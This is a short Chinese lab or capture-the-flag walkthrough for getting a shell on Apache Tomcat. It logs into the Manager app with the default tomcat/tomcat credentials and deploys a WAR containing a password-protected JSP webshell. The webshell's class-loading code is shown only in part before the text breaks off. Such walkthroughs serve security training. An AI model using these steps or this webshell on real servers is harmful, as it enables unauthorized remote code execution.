漏洞介绍
名称:Tomcat-pass-getshell 弱口令
描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell
解题过程
1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat
2、拖动页面,找到war上传区域,上传jsp木马:
制作jsp木马,下段jsp木马密码为:passwd,将下述代码保存为jsp格式,并将jsp格式文件打包压缩成为war文件格式进行上传。
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);